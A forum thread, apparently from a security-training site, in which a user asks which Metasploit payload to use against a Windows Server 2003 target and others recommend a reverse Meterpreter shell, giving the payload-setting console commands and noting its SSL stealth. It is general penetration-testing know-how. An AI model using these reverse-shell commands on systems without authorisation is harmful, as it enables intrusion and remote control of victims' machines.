a question about metasploit

This topic contains 8 replies, has 6 voices, and was last updated by  nytfox 7 years, 9 months ago.

  • Author
  • #7027
     midnight monster 

    Hello there!
    i have a problem witn metasploit i dont wich of payloads is best for my exploit ( i know the server vulnerabilite and i sure about my expliot )and when i use “show payloads” command i see a lot of compatible payloads please help me to find the best payload

  • #43613

    The “best” payload to use will depend on you scenario.


  • #43614

    Try each one and see which works best for you! That’s part of the fun of Metasploit. For each one that doesn’t work try to find out why!


  • #43615

    As previously mentioned we don’t know your environment, or your target for that matter.

    If it’s within a local lab environment, targeting a Windows system, give the reverse meterpreter a try…

    set payload windows/meterpreter/reverse_tcp
    set lhost
    set lport 8888

  • #43616
     midnight monster 

    oh steve are you kiding!! it has hundred compatible payload and it takes a lot of time for me

  • #43617

    @midnight monster wrote:

    oh steve are you kiding!! it has hundred compatible payload and it takes a lot of time for me

    OK. What is the server OS and vulnerability? If it’s Windows then Meterpereter (as mentioned by BILLV) is always a favorite of mine.


  • #43618

    On Windows, a meterpreter is always better because all windows post modules support it (plus tons of features).  It also communicates in SSL, so that adds a bit more stealth.  On Linux though, it’s a different story, honestly you’re probably better off with a non-meterpreter shell, because the Linux meterpreter isn’t as good as the windows one.

    reverse vs bind… come to think about it, I almost never use bind these days on a machine behind a firewall.  But people do use bind shells.

    By the way, when you select an exploit, and do “show payloads” — that will only show all the payloads compatible with that particular exploit.  If you’re testing a web app exploit, keep in mind php/exec might not return an output (even though the command ran successfully).

    If you’re still clueless about which payload to use, just use a reverse meterpreter like everybody else has been recommending.

    Lastly, perhaps you should consider asking Metasploit questions on #metasploit in freenode, so the actual metasploit dev team can answer your questions more quickly.

    And yes… I did sign up for an account here just to answer your question.

  • #43619
     midnight monster 

    Thank you msfsinn3r your info was very useful for me
    my sever is windows server 2003
    and thanks alot

  • #43620

    btw you can use search commend to get selected exploits , like “search smb” . try it and lemme know 🙂

You must be logged in to reply to this topic.

Copyright ©2019 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.


Sign in with Caendra

Forgot password?Sign up

Forgot your details?